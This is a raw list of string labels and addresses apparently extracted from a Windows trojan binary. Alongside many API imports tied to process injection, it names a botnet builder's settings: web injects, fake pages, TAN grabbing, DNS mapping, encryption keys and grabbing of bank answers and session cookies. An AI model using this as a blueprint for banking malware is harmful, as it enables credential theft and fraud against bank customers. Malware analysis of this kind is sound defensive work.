aWriteprivate_2 0041FA94
aWriteprivate_3 0041FAB0 aWriteprivate_4 0041FACC
aWritefilegathe 0041FAE8
aWritefileex 0041FAF8
aWritefile_0 0041FB04
aWriteconsolew 0041FB10
aWriteconsoleou 0041FB20 aWriteconsole_0 0041FB34
aWriteconsole_1 0041FB54
aWriteconsole_2 0041FB74 aWriteconsole_3 0041FB90
aWriteconsolein 0041FBA4
aWriteconsole_4 0041FBB8 aWriteconsolea 0041FBCC
aWinexec 0041FBDC
aWidechartomu_0 0041FBE4
aSetfiletime 00406014
aGetcomputernam 00406020 aFindclose 00406034
aFindnextfilew 00406040
aFindfirstfilew 00406050 aGettempfilenam 00406060
aSystemtimetofi 00406074
aGetsystemtime 0040608C aLeavecriticals 0040609C
aEntercriticals 004060B4
aInitializecrit 004060CC aReadprocessmem 004060E8
aSetlasterror 004060FC
aIsbadwriteptr 0040610C aIsbadreadptr 0040611C
aGettemppathw 0040612C
aCreatedirector 0040613C aMovefileexw 00406150
aWidechartomult 0040615C
aMultibytetowid 00406170
aGetprocesstime 00406184
aCreateprocessw 00406194
aGetcurrentthre 004061A4 aGetcurrentth_0 004061B8
aGetthreadprior 004061CC
aSetthreadprior 004061E0 aGetcurrentproc 004061F4
aVirtualfreeex 00406208
aVirtualprote_0 00406218 aVirtualallocex 0040622C
aVirtualqueryex 0040623C
aOpenprocess 0040624C aExitprocess 00406258
aExitthread 00406264
aGetexitcodepro 00406270 aThread32next 00406284
aThread32first 00406294
aModule32nextw 004062A4 aModule32firstw 004062B4
aProcess32nextw 004062C4
aProcess32first 004062D4 aCreatetoolhelp 004062E4
aCreateremoteth 00406300
aCreatethread 00406314 aWriteprocessme 00406324
aDisconnectname 00406338
aGetlocaltime 0040634C aFlushfilebuffe 0040635C
aGetfilesize 00406370
aSetendoffile 0040637C aReadfile 0040638C
aWritefile 00406398 aGettickcount 004063A4
aCreatenamedpip 004063B4
aSetnamedpipeha 004063C8 aWaitnamedpipew 004063E0
aConnectnamedpi 004063F0
aHeapfree 00406404
aHeaprealloc 00406410
aHeapalloc 0040641C
aHeapdestroy 00406428 aHeapcreate 00406434
aSetfilepointer 00406440
aCreateeventw 00406450 aCreatefilew 00406460
aSetevent 0040646C
aWaitforsingleo 00406478 aSetfileattribu 0040648C
aDeletefilew 004064A0
aClosehandle 004064AC
aGetclassinfo_0 0041BF54
aGetclassinfoa 0041BF64 aGetcaretpos 0041BF74
aGetcaretblinkt 0041BF80
aGetcapture 0041BF94 aGetasynckeysta 0041BFA0
aGetancestor 0041BFB4
aGetalttabinfo 0041BFC0 aGetactivewindo 0041BFD0
aFreeddelparam 0041BFE0
aFramerect 0041BFF0 aFlashwindowex 0041BFFC
aFlashwindow 0041C00C
aFindwindoww 0041C018 aFindwindowex_0 0041C024
aFindwindowexa 0041C034
aFindwindowa 0041C044 aFillrect 0041C050
aExitwindowse_0 0041C05C
aExcludeupdater 0041C06C
aEqualrect 0041C080
aEnumwindows 0041C08C
aEnumwindowstat 0041C098 aEnumwindowst_0 0041C0AC
aEnumthreadwind 0041C0C0
aEnumpropsw 0041C0D4 aEnumpropsexw 0041C0E0
aEnumpropsexa 0041C0F0
aEnumpropsa 0041C100 aEnumdisplayset 0041C10C
aEnumdisplays_0 0041C124
aEnumdisplays_1 0041C13C aEnumdisplays_2 0041C154
aEnumdisplaymon 0041C16C
aEnumdisplaydev 0041C180 aEnumdisplayd_0 0041C194
aEnumdesktopsw 0041C1A8
aEnumdesktopsa 0041C1B8 aEnumdesktopwin 0041C1C8
aEnumclipboardf 0041C1DC
aEnumchildwindo 0041C1F4 aEndtask 0041C208
aEndpaint 0041C210
aEndmenu 0041C21C aEnddialog 0041C224
aEnddeferwindow 0041C230
aEnablewindow 0041C244 aEnablescrollba 0041C254
aEnablemenuitem 0041C264
aEmptyclipboard 0041C274 aEditwndproc 0041C284
aDrawtextw 0041C290 aDrawtextexw 0041C29C
aDrawtextexa 0041C2A8
aDrawtexta 0041C2B4 aDrawstatew 0041C2C0
aDrawstatea 0041C2CC
aDrawmenubar 0041C2D8
aDrawiconex 0041C2E4
aDrawicon_0 0041C2F0
aDrawframecontr 0041C2FC aDrawframe 0041C310
aDrawfocusrect 0041C31C
aDrawedge 0041C32C aDrawcaption 0041C338
aDrawanimatedre 0041C344
aDragobject 0041C358 aDragdetect 0041C364
aDlgdirselectex 0041C370
aDlgdirselect_0 0041C380
aWaitnamedpip_0 0041FBF8
aWaitnamedpipea 0041FC08 aWaitforsingl_0 0041FC18
aWaitforsingl_1 0041FC30
aWaitformulti_0 0041FC44 aWaitformulti_1 0041FC60
aWaitfordebugev 0041FC78
aWaitcommevent 0041FC8C aVirtualunlock 0041FC9C
aVirtualquery_0 0041FCAC
aVirtualquery 0041FCBC aVirtualprote_1 0041FCCC
aVirtualprotect 0041FCE0
aVirtuallock 0041FCF0 aVirtualfreee_0 0041FCFC
aVirtualfree 0041FD0C
aVirtualalloc_0 0041FD18 aVirtualalloc 0041FD28
aVerlanguagenam 0041FD38
aVerlanguagen_0 0041FD4C
aUpdateresource 0041FD60
aUpdateresour_0 0041FD70
aUnmapviewoff_0 0041FD80 aUnlockfileex 0041FD90
aUnlockfile 0041FDA0
aUnhandledexcep 0041FDAC aTransmitcommch 0041FDC8
aTransactnamedp 0041FDDC
aToolhelp32read 0041FDF0 aTlssetvalue 0041FE0C
aTlsgetvalue 0041FE18
aTlsfree 0041FE24 aTlsalloc 0041FE2C
aThread32next_0 0041FE38
aThread32firs_0 0041FE48 aTerminatethrea 0041FE58
aTerminateproce 0041FE68
aSystemtimetotz 0041FE7C aSystemtimeto_0 0041FE9C
aSwitchtothread 0041FEB4
aSwitchtofiber 0041FEC4 aSuspendthrea_0 0041FED4
aSleepex 0041FEE4
aSleep_0 0041FEEC aSizeofresource 0041FEF4
aSignalobjectan 0041FF04
aSetupcomm 0041FF18 aSetwaitabletim 0041FF24
aSetvolumelabel 0041FF38
aSetvolumelab_0 0041FF48 aSetunhandledex 0041FF58
aSettimezoneinf 0041FF74 aSetthreadpri_0 0041FF8C
aSetthreadpri_1 0041FFA4
aSetthreadlocal 0041FFB8 aSetthreadideal 0041FFC8
aSetthreadexecu 0041FFE0
aSetthreadconte 0041FFF8
aSetthreadaffin 0042000C
aSettapepositio 00420024
aSettapeparamet 00420034 aSetsystemtimea 00420048
aSetsystemtime 00420060
aSetsystempower 00420070 aSetstdhandle 00420084
aSetprocesswork 00420094
aSetprocessshut 004200B0 aSetprocessprio 004200D0
aSetprocessaffi 004200E8
aSetprioritycla 00420100
aLstrcata 004064B8
aLstrcatw 004064C4 aLstrcpya 004064D0
aLstrcpyna 004064DC
aLstrcpynw 004064E8 aLstrcpyw 004064F4
aLstrcmpia 00406500
aLstrcmpiw 0040650C aReleasemutex 00406518
aOpenmutexw 00406528
aCreatemutexw 00406534 aGetlasterror 00406544
aSetfilepoint_0 00406554
aGetmodulefil_0 00406568 aGetmodulefil_1 0040657C
aCopyfilew 00406590
aSleep 0040659C aGetmodulehandl 004065A4
aGetuserdefau_0 004065B8
aGetversionexw 004065D4
aGettimezoneinf 004065E4
aResetevent 004065FC
aUnmapviewoffil 00406608 aMapviewoffile 00406618
aCreatefilemapp 00406628
aGetfilesizeex 0040663C aGetdrivetypew 0040664C
aGetlogicaldriv 0040665C
aGetcommandline 00406670 aGetprocessheap 00406680
aGetfileattribu 00406690
aGetprocessid 004066A4 aSuspendthread 004066B4
aFreelibrary 004066C4
aOpenthread 004066D0 aResumethread 004066DC
aText 004066F8
aGetthreadconte 00406700 aCreatetimerque 00406714
aFiletimetodosd 0040672C
aFiletimetoloca 00406744 aGetfileinforma 0040675C
aWaitformultipl 00406778
aGetvolumenamef 00406790 aGetoverlappedr 004067B4
aGetenvironme_0 004067C8
aLocalfree 004067E0 aFormatmessagew 004067EC
aWtsqueryuserto 00406FF8
aUserenv_dll 0040700C aCreateenvironm 00407018
aDestroyenviron 00407030 aSeshutdownpriv 00407048
aKdL324j 00407070
aSRefererSSdata 00407084 aDllunregisters 004070BC
aDllregisterser 004070D0
aDllgetclassobj 004070E4
aDllcanunloadno 004070F8
aSyslistview32 00407108
aVersion 00407128 aSoftwareWebmon 00407138
aWmkeeperDataWm 00407160
aKwm 004071F0 aKwmS_S 004071F8
aTxt 0040720C
aSoftwareMicr_1 00407218 aEnabled 00407280
aEnabledv8 00407290
aSIeSessionCook 004072A4
aDlgdirselectco 0041C390
aDlgdirselect_1 0041C3A8 aDlgdirlistw 0041C3C0
aDlgdirlistcomb 0041C3CC
aDlgdirlistco_0 0041C3E0 aDlgdirlista 0041C3F4
aDispatchmess_1 0041C400
aDispatchmess_2 0041C414 aDialogboxparam 0041C428
aDialogboxpar_0 0041C438
aDialogboxindir 0041C448 aDialogboxind_0 0041C460
aDestroywindow 0041C478
aDestroymenu 0041C488 aDestroyicon 0041C494
aDestroycursor 0041C4A0
aDestroycaret 0041C4B0 aDestroyacceler 0041C4C0
aDeletemenu 0041C4D8
aDeferwindowpos 0041C4E4
aDefwindowprocw 0041C4F4
aDefwindowproca 0041C504
aDefmdichildpro 0041C514 aDefmdichildp_0 0041C528
aDefframeprocw 0041C53C
aDefframeproca 0041C54C aDefdlgprocw 0041C55C
aDefdlgproca 0041C568
aDdeuninitializ 0041C574 aDdeunaccessdat 0041C584
aDdesetuserhand 0041C594
aDdesetqualityo 0041C5A8 aDdereconnect 0041C5C0
aDdequerystring 0041C5D0
aDdequerystri_0 0041C5E0 aDdequerynextse 0041C5F0
aDdequeryconvin 0041C604
aDdepostadvise 0041C618 aDdenameservice 0041C628
aDdekeepstringh 0041C638
aDdeinitializew 0041C64C aDdeinitializea 0041C65C
aDdeimpersonate 0041C66C
aDdegetlasterro 0041C684 aDdegetdata 0041C694
aDdefreestringh 0041C6A0
aDdefreedatahan 0041C6B4 aDdeenablecallb 0041C6C8
aDdedisconnectl 0041C6DC
aDdedisconnect 0041C6F0 aDdecreatestrin 0041C700
aDdecreatestr_0 0041C718 aDdecreatedatah 0041C730
aDdeconnectlist 0041C744
aDdeconnect 0041C754 aDdecmpstringha 0041C760
aDdeclienttrans 0041C774
aDdeadddata 0041C78C
aDdeaccessdata 0041C798
aDdeabandontran 0041C7A8
aCreatewindowst 0041C7C0 aCreatewindow_0 0041C7D8
aCreatewindowex 0041C7F0
aCreatewindow_1 0041C800 aCreatepopupmen 0041C810
aCreatemenu 0041C820
aCreatemdiwindo 0041C82C aCreatemdiwin_0 0041C840
aCreateiconindi 0041C854
aCreateiconfrom 0041C868
aSetnamedpipe_0 00420114
aSetmessagewait 0042012C aSetmailslotinf 00420148
aSetlocaleinfow 00420158
aSetlocaleinfoa 00420168 aSetlocaltime 00420178
aSetlasterror_0 00420188
aSethandleinfor 00420198 aSethandlecount 004201B0
aSetfiletime_0 004201C0
aSetfilepoint_1 004201CC aSetfileattri_0 004201DC
aSetfileattri_1 004201F0
aSetfileapistoo 00420204 aSetfileapistoa 00420218
aSetevent_0 0042022C
aSeterrormode 00420238 aSetenvironment 00420248
aSetenvironme_0 00420260
aSetendoffile_0 00420278
aSetdefaultcomm 00420288
aSetdefaultco_0 004202A0
aSetcurrentdire 004202B8 aSetcurrentdi_0 004202D0
aSetconsolewind 004202E8
aSetconsoletitl 00420300 aSetconsoleti_0 00420314
aSetconsoletext 00420328
aSetconsolescre 00420340 aEtconsoleoutpu 0042035D
aSetconsolemode 00420370
aSetconsolecurs 00420380 aSetconsolecu_0 0042039C
aSetconsolectrl 004203B4
aSetconsolecp 004203CC aSetconsoleacti 004203DC
aEtcomputername 004203FD
aSetcomputernam 00420410 aSetcommtimeout 00420424
aSetcommstate 00420434
aSetcommmask 00420444 aSetcommconfig 00420450
aEtcommbreak 00420461
aSetcalendarinf 00420470 aSetcalendari_0 00420484
aSearchpathw 00420498
aSearchpatha 004204A4 aScrollconsoles 004204B0
aCrollconsolesc 004204CD
aRtlfillmemory 004204E8 aResumethread_0 004204F8
aResetwritewatc 00420508 aResetevent_0 00420518
aRequestwakeupl 00420524
aRequestdevicew 0042053C aRemovedirector 00420550
aRemovedirect_0 00420564
aReleasesemapho 00420578
aReleasemutex_0 0042058C
aReadprocessm_0 0042059C
aReadfilescatte 004205B0 aReadfileex 004205C0
aReadfile_0 004205CC
aReaddirectoryc 004205D8 aReadconsolew 004205F0
aReadconsoleo_0 00420600
aReadconsoleout 00420614 aReadconsoleo_1 00420630
aReadconsoleo_2 0042064C
aReadconsoleo_3 00420668
aSelect_0 004072DC
aOptionSelected 004072E8 aInputValue 004072FC
aBofaAnswersS 00407310
a0Uu 00407334 aGrab_S_02u_02u 0040733C
aGrabbedDataFro 00407374
aFtp 004073A8 aPop3 004073AC
aSSS@U_U_U_UU 004073B4
a_h_64ad0625_ 004073EC a__system__64ad 00407408
aMozilla4_0Comp 0040743C
aHttp1_1 00407474 aUrlmon_dll 00407480
aObtainuseragen 0040748C
a?o 004074A4 a?i 004074A8
a?t 004074AC
aCab 004074B0
aCabinet_dll 004074B8
aFcicreate 004074C4
aFciaddfile 004074D0 aFciflushcabine 004074DC
aFcidestroy 004074EC
aBc 00407500 aBuildingBotFil 004188D0
aNotEnoughMemor 004188FC
aStaticconfig 00418920 aFailedToFindEn 00418930
aBotnet 00418998
aBotnetS 004189A0 aBotnetDefault 004189B4
aTimer_config 004189E0
aTimer_configUm 004189F0 aTimer_logs 00418A20
aTimer_logsUmsU 00418A2C
aTimer_stats 00418A58 aTimer_statsUms 00418A64
aUrl_config 00418A94
aCanTFindUrl__0 00418AA0 aUrl_configS 00418ADC
aUrl_compip 00418AF8
aCanTFindUrl_co 00418B04 aUrl_compipS 00418B40
aEncryption_key 00418B5C
aCanTFindEncryp 00418B70 aEncryption_k_0 00418BB4
aBlacklist_lang 00418BD8
aBlacklist_la_0 00418BEC aSourcePeCorrup 00418C20
a_data1 00418C4C aPercent_of_ove 00418C54
aDynamicconfig 00418C68
aUrl_loader 00418C78 String2 00418C84
aFailedToWriteO 00418C94
aBuildSucceeded 00418CD0
Str1 00418CF4
aData_before 00418CFC
aData_inject 00418D0C aData_after 00418D1C
aData_end 00418D2C
aFailedToOpenFi 00418D38 aUS 00418D84
aBadFormatOfWeb 00418D90
aSUS 00418DC4 aFailedToFind_0 00418DD8
aCanTFindUrl_lo 00418E44
aUrl_loaderS 00418E80
aCreateiconfr_0 0041C884
aCreateicon 0041C89C aCreatedialogpa 0041C8A8
aCreatedialog_0 0041C8BC
aCreatedialogin 0041C8D0 aCreatedialog_1 0041C8EC
aCreatedesktopw 0041C908
aCreatedesktopa 0041C918 aCreatecursor 0041C928
aCreatecaret 0041C938
aCreateaccelera 0041C944 aCreateaccele_0 0041C95C
aCountclipboard 0041C974
aCopyrect 0041C98C aCopyimage 0041C998
aCopyicon 0041C9A4
aCopyaccelerato 0041C9B0 aCopyaccelera_0 0041C9C8
aClosewindows_0 0041C9E0
aClosewindow 0041C9F4
aClosedesktop_0 0041CA00
aCloseclipboard 0041CA10
aClipcursor 0041CA20 aClienttoscreen 0041CA2C
aChildwindowfro 0041CA3C
aChildwindowf_0 0041CA54 aCheckradiobutt 0041CA6C
aCheckmenuradio 0041CA80
aCheckmenuitem 0041CA94 aCheckdlgbutton 0041CAA4
aCharupperw_0 0041CAB4
aCharupperbuffw 0041CAC0 aCharupperbuffa 0041CAD0
aCharuppera 0041CAE0
aChartooemw_0 0041CAEC aChartooembuffw 0041CAF8
aChartooembuffa 0041CB08
aChartooema 0041CB18 aCharprevw 0041CB24
aCharprevexa 0041CB30
aCharpreva 0041CB3C aCharnextw 0041CB48
aCharnextexa 0041CB54
aCharnexta 0041CB60 aCharlowerw 0041CB6C
aCharlowerbuffw 0041CB78
aCharlowerbuf_0 0041CB88 aCharlowera 0041CB98
aChangemenuw 0041CBA4
aChangemenua 0041CBB0 aChangedisplays 0041CBBC
aChangedispla_0 0041CBD4 aChangedispla_1 0041CBF0
aChangedispla_2 0041CC0C
aChangeclipboar 0041CC24 aCascadewindows 0041CC3C
aCascadechildwi 0041CC4C
aCallwindowproc 0041CC60
aCallwindowpr_0 0041CC70
aCallnexthookex 0041CC80
aCallmsgfilterw 0041CC90 aCallmsgfiltera 0041CCA0
aCallmsgfilter 0041CCB0
aBroadcastsyste 0041CCC0 aBroadcastsys_0 0041CCD8
aBroadcastsys_1 0041CCF0
aBringwindowtot 0041CD08 aBlockinput 0041CD1C
aBeginpaint 0041CD28
aBegindeferwind 0041CD34
aReadconsoleinp 0042067C
aReadconsolei_0 00420690 aReadconsolea 004206A4
aRaiseexception 004206B4
aQueueuserapc 004206C4 aQueryperform_0 004206D4
aQueryperforman 004206F0
aQuerydosdevice 00420708 aQuerydosdevi_0 00420718
aPurgecomm 00420728
aPulseevent 00420734 aProcess32next 00420740
aProcess32fir_0 00420750
aPreparetape 00420760 aPostqueuedcomp 0042076C
aPeeknamedpipe 00420788
aPeekconsoleinp 00420798 aPeekconsolei_0 004207AC
aOutputdebugstr 004207C0
aOutputdebugs_0 004207D4
aOpenwaitableti 004207E8
aOpenwaitable_0 004207FC
aOpensemaphorew 00420810 aOpensemaphorea 00420820
aOpenprocess_0 00420830
aOpenmutexw_0 0042083C aOpenmutexa 00420848
aOpenfilemappin 00420854
aOpenfilemapp_0 00420868 aOpenfile 0042087C
aOpeneventw 00420888
aOpeneventa 00420894 aMultibytetow_0 004208A0
aMuldiv 004208B4
aMovefilew 004208BC aMovefileexw_0 004208C8
aMovefileexa 004208D4
aMovefilea 004208E0 aModule32next 004208EC
aModule32first 004208FC
aMapviewoffilee 0042090C aMapviewoffil_0 0042091C
aLockresource 0042092C
aLockfileex 0042093C aLockfile 00420948
aLocalunlock 00420954
aLocalsize 00420960 aLocalshrink 0042096C
aLocalrealloc 00420978
aLocallock 00420988 aLocalhandle 00420994
aLocalfree_0 004209A0 aLocalflags 004209AC
aLocalfiletimet 004209B8
aLocalcompact 004209D0 aLocalalloc 004209E0
aLoadresource 004209EC
aLoadmodule 004209FC
aLoadlibraryw 00420A08
aLoadlibraryexw 00420A18
aLoadlibraryexa 00420A28 aLoadlibrarya_0 00420A38
aLcmapstringw 00420A48
aLcmapstringa 00420A58 aIsvalidlocale 00420A68
aIsvalidcodepag 00420A78
aIssystemresume 00420A88 aIsprocessorfea 00420AA0
aIsdebuggerpres 00420ABC
aIsdbcsleadbyte 00420AD0
aUrl_server 00418E9C
aCanTFindUrl_se 00418EA8 aUrl_serverS 00418EE4
aBadAdvancedCon 00418F00
aAdvancedconfig 00418F3C aAdvancedconf_0 00418F4C
aBadWebFilterFo 00418F5C
aWebfilter 00418F8C aWebfilters 00418F98
aBadWebDataFilt 00418FA4
aWebdatafilter 00418FE0 aWebdatafilters 00418FF0
aWebfakes 00419000
aBadWebfakeFoun 0041900C aWebfakeUSS 00419038
aTangrabber 00419064
aBadTanGrabberR 00419070 aTangrabberUS 004190B0
aBadDnsMapFound 004190D4
aDnsmap 00419100
aFile_webinject 00419108
aFile_webinje_0 00419118
aWritingWebInje 00419140 aCfg_bin 00419174
aBuildSucceed_0 00419184
aLoadingConfigF 004191B0 aLoadingSucceed 004191F4
aFailedToLoadCo 0041921C
aConfig_txt 00419254 aTextFiles_txt 00419270
a_txt_0 00419298
aA 004192A2 aLlFiles 004192A4
a_ 004192B8
aBuilder 004192C0 aInformation 004192D0
Name 004192E8
aVira_2109 004192EC aDefault 00419304
aVersionU_U_U_U 00419320
String 004193A8 aRemovingSpywar 004193F0
aRemovingSpyw_0 00419418
Caption 00419474 aSpywareRemoved 00419490
Text 00419510
aLexx 00419584 a13024128_09_20 0041958C
aVersionU_U_U_0 004195C0
a_Pipe 00419618 aErrorS 0041962C
aOle32_dll 00419644 aShlwapi_dll 00419650
aAdvapi32_dll 0041965C
aUser32_dll 0041966C aKernel32_dll 00419678
aWritestringstr 00419688
aWriteolestg 0041969C
aWritefmtuserty 004196A8
aWriteclassstm 004196BC
aWriteclassstg 004196CC aUtgetdvtd32inf 004196DC
aUtgetdvtd16inf 004196EC
aUtconvertdvtd3 004196FC aUtconvertdvtd1 00419714
aUpdatedcomsett 0041972C
aStringfromiid 00419740 aStringfromgu_0 00419750
aStringfromclsi 00419760
aStgsettimes 00419770
aAttachthreadin 0041CD48
aArrangeiconicw 0041CD5C aAppendmenuw 0041CD74
aAppendmenua 0041CD80
aAnypopup 0041CD8C aAnimatewindow 0041CD98
aAdjustwindowre 0041CDA8
aAdjustwindow_0 0041CDBC aUnlockserviced 0041CDD0
aTrusteeaccesst 0041CDE8
aTrusteeacces_0 0041CE00 aStartservicew 0041CE18
aStartservicect 0041CE28
aStartservice_0 0041CE44 aStartservicea 0041CE60
aSettokeninform 0041CE70
aSetthreadtoken 0041CE84 aSetservicestat 0041CE94
aSetserviceobje 0041CEA8
aSetservicebits 0041CEC4
aSetsecurityinf 0041CED4
aSetsecurityi_0 0041CEE8
aSetsecurityi_1 0041CEFC aSetsecurityd_0 0041CF0C
aSetsecurityd_1 0041CF28
aSetsecurityd_2 0041CF44 aSetsecurityd_3 0041CF60
aSetprivateobje 0041CF7C
aSetnamedsecuri 0041CF98 aSetnamedsecu_0 0041CFB0
aSetnamedsecu_1 0041CFC8
aSetnamedsecu_2 0041CFE0 aSetkernelobjec 0041CFF8
aSetfilesecurit 0041D010
aSetfilesecur_0 0041D024 aSetentriesinau 0041D038
aSetentriesin_0 0041D050
aSetentriesinac 0041D068 aSetentriesin_1 0041D07C
aSetentriesin_2 0041D090
aSetentriesin_3 0041D0A8 aSetaclinformat 0041D0C0
aReverttoself 0041D0D4
aReporteventw 0041D0E4 aReporteventa 0041D0F4
aRegisterservic 0041D104
aRegisterserv_0 0041D120 aRegisterevents 0041D13C
aRegistereven_0 0041D154
aRegunloadkeyw 0041D16C aRegunloadkeya 0041D17C
aRegsetvaluew 0041D18C aRegsetvaluee_0 0041D19C
aRegsetvaluee_1 0041D1AC
aRegsetvaluea 0041D1BC aRegsetkeysecur 0041D1CC
aRegsavekeyw 0041D1E0
aRegsavekeya 0041D1EC
aRegrestorekeyw 0041D1F8
aRegrestorekeya 0041D208
aRegreplacekeyw 0041D218 aRegreplacekeya 0041D228
aRegqueryvaluew 0041D238
aRegqueryvalu_0 0041D248 aRegqueryvalu_1 0041D25C
aRegqueryvaluea 0041D270
aRegquerymultip 0041D280 aRegquerymult_0 0041D298
aRegqueryinfoke 0041D2B0
aRegqueryinfo_0 0041D2C4
aIsdbcsleadby_0 00420AE4
aIsbadwritept_0 00420AF4 aIsbadstringptr 00420B04
aIsbadstringp_0 00420B14
aIsbadreadptr_0 00420B24 aIsbadhugewrite 00420B34
aIsbadhugereadp 00420B48
aIsbadcodeptr 00420B5C aInitializecr_0 00420B6C
aInitatomtable 00420B94
aHeapwalk 00420BA4 aHeapvalidate 00420BB0
aHeapunlock 00420BC0
aHeaplock 00420BCC aHeapfree_0 00420BD8
aHeapdestroy_0 00420BE4
aHeapcreate_0 00420BF0 aHeapcompact 00420BFC
aEap32next 00420C09
aHeap32listnext 00420C14
aHeap32listfirs 00420C24
aHeap32first 00420C34
aGlobalwire 00420C40 aGlobalunlock_0 00420C4C
aGlobalunfix 00420C5C
aGlobalunwire 00420C68 aLobalsize 00420C79
aGlobalrealloc 00420C84
aGlobalmemoryst 00420C94 aGloballock_0 00420CA8
aGlobalhandle 00420CB4
aGlobalgetatomn 00420CC4 aGlobalgetato_0 00420CD8
aLobalfree 00420CED
aGlobalflags 00420CF8 aGlobalfix 00420D04
aGlobalfindatom 00420D10
aGlobalfindat_0 00420D20 aGlobaldeleteat 00420D30
aGlobalcompact 00420D44
aGlobalalloc 00420D54 aLobaladdatomw 00420D61
aGlobaladdatoma 00420D70
aGetwritewatch 00420D80 aGetwindowsdire 00420D90
aGetwindowsdi_0 00420DA8
aGetvolumeinfor 00420DC0 aGetvolumeinf_0 00420DD8
aGetversionex_0 00420DF0
aGetversionexa 00420E00 aGetversion 00420E10
aGetuserdefau_1 00420E1C aGetuserdefault 00420E34
aGettimezonei_0 00420E48
aGettimeformatw 00420E60 aGettimeformata 00420E70
aGettickcount_0 00420E80
aGetthreadtimes 00420E90
aGetthreadselec 00420EA0
aGetthreadpri_0 00420EB8
aGetthreadpri_1 00420ED0 aGetthreadlocal 00420EE4
aGetthreadcon_0 00420EF4
aGettemppathw_0 00420F08 aGettemppatha 00420F18
aGettempfilen_0 00420F28
aGettempfilen_1 00420F3C aGettapestatus 00420F50
aGettapepositio 00420F60
aGettapeparamet 00420F70
aStgopenstorage 0041977C
aStgopenstora_0 00419798 aStgopenstora_1 004197AC
aStgopenasyncdo 004197BC
aStgisstorageil 004197E0 aStgisstoragefi 004197F8
aStggetifillloc 0041980C
aStggetifilll_0 00419830 aStgcreatestora 0041984C
aStgcreatedocfi 00419860
aStgcreatedoc_0 00419880 aSetdocumentbit 00419894
aSetconvertstg 004198A8
aRevokedragdrop 004198B8 aReleasestgmedi 004198C8
aRegisterdragdr 004198DC
aReadstringstre 004198F0 aReadolestg 00419904
aReadfmtusertyp 00419910
aReadclassstm 00419924
aReadclassstg 00419934
aPropvariantcop 00419944
aPropvariantcle 00419954 aProgidfromclsi 00419968
aOpenorcreatest 00419978
aOleuninitializ 0041998C aOletranslateac 0041999C
aOlesetmenudesc 004199B4
aOlesetcontaine 004199CC aOlesetclipboar 004199E4
aOlesetautoconv 004199F4
aOlesavetostrea 00419A08 aOlesave 00419A18
aOlerun 00419A20
aOlereggetusert 00419A28 aOlereggetmiscs 00419A3C
aOleregenumverb 00419A50
aOleregenumform 00419A60 aOlequerylinkfr 00419A74
aOlequerycreate 00419A8C
aOlenoteobjectv 00419AA4 aOlemetafilepic 00419ABC
aOlelockrunning 00419ADC
aOleloadfromstr 00419AEC aOleload 00419B00
aOleisrunning 00419B08
aOleiscurrentcl 00419B18 aOleinitialize 00419B30
aOlegeticonoffi 00419B40
aOlegeticonofcl 00419B54 aOlegetclipboar 00419B68
aOlegetautoconv 00419B78 aOleflushclipbo 00419B8C
aOleduplicateda 00419BA0
aOledraw 00419BB4 aOledoautoconve 00419BBC
aOledestroymenu 00419BD0
aOlecreatestati 00419BEC
aOlecreatemenud 00419C04
aOlecreatelinkt 00419C1C
aOlecreatelin_0 00419C34 aOlecreatelinkf 00419C48
aOlecreatelin_1 00419C60
aOlecreatelinke 00419C78 aOlecreatelink 00419C88
aOlecreatefromf 00419C98
aOlecreatefro_0 00419CAC aOlecreatefromd 00419CC0
aOlecreatefro_1 00419CD4
aOlecreateex 00419CE8
aRegopenkeyw 0041D2D8
aRegopenkeyex_0 0041D2E4 aRegopenkeyexa 0041D2F4
aRegopenkeya 0041D304
aRegnotifychang 0041D310 aRegloadkeyw 0041D328
aRegloadkeya 0041D334
aReggetkeysecur 0041D340 aRegflushkey 0041D354
aRegenumvaluew 0041D360
aRegenumvaluea 0041D370 aRegenumkeyw 0041D380
aRegenumkeyex_0 0041D38C
aRegenumkeyexa 0041D39C aRegenumkeya 0041D3AC
aRegdeleteval_0 0041D3B8
aRegdeleteval_1 0041D3C8 aRegdeletekeyw 0041D3D8
aRegdeletekeya 0041D3E8
aRegcreatekeyw 0041D3F8
aRegcreatekey_1 0041D408
aRegcreatekey_2 0041D418
aRegcreatekeya 0041D428 aRegconnectregi 0041D438
aRegconnectre_0 0041D44C
aRegclosekey_0 0041D460 aReadeventlogw 0041D46C
aReadeventloga 0041D47C
aQueryservicest 0041D48C aQueryserviceob 0041D4A0
aQueryservicelo 0041D4BC
aQueryservice_0 0041D4D4 aQueryserviceco 0041D4EC
aQueryservice_1 0041D500
aPrivilegedserv 0041D514 aPrivilegedse_0 0041D534
aPrivilegecheck 0041D554
aOpenthreadtoke 0041D564 aOpenservicew 0041D574
aOpenservicea 0041D584
aOpenscmanagerw 0041D594 aOpenscmanagera 0041D5A4
aOpenprocesst_0 0041D5B4
aOpeneventlogw 0041D5C8 aOpeneventloga 0041D5D8
aOpenbackupeven 0041D5E8
aOpenbackupev_0 0041D5FC aObjectprivileg 0041D610
aObjectprivil_0 0041D62C
aObjectopenaudi 0041D648 aObjectopenau_0 0041D660
aObjectdeleteau 0041D678 aObjectdelete_0 0041D690
aObjectcloseaud 0041D6A8
aObjectclosea_0 0041D6C0 aNotifychangeev 0041D6D8
aNotifybootconf 0041D6F0
aMapgenericmask 0041D708
aMakeselfrelati 0041D718
aMakeabsolutesd 0041D72C
aLookupsecurity 0041D73C aLookupsecuri_0 0041D75C
aLookupprivil_0 0041D77C
aLookupprivil_1 0041D794 aLookupprivil_2 0041D7AC
aLookupprivil_3 0041D7C4
aLookupprivil_4 0041D7DC aLookupprivil_5 0041D7F8
aLookupaccoun_0 0041D814
aLookupaccoun_1 0041D828
aGetsystemtimea 00420F84
aGetsystemtim_0 00420F9C aGetsystemtim_1 00420FB4
aGetsystempower 00420FC4
aGetsysteminfo 00420FDC aGetsystemdirec 00420FEC
aGetsystemdir_0 00421000
aGetsystemdefau 00421014 aGetsystemdef_0 0042102C
aGetstringtypew 00421044
aGetstringtypee 00421054 aGetstringtyp_0 00421068
aGetstringtypea 0042107C
aGetstdhandle 0042108C aGetstartupinfo 0042109C
aGetstartupin_0 004210AC
aGetshortpathna 004210BC aGetshortpath_0 004210D0
aGetqueuedcompl 004210E4
aGetprofilestri 00421100
aGetprofilest_0 00421114
aGetprofilesect 00421128
aGetprofilese_0 0042113C aGetprofileintw 00421150
aGetprofileinta 00421160
aGetprocesswork 00421170 aGetprocessvers 0042118C
aGetprocessti_0 004211A0
aGetprocessshut 004211B0 aGetprocessprio 004211D0
aGetprocesshe_0 004211E8
aGetprocesshe_1 004211F8 aGetprocessaffi 00421208
aGetprocaddre_0 00421220
aGetprivatepr_0 00421230 aGetprivatepr_1 0042124C
aGetprivatepr_2 00421268
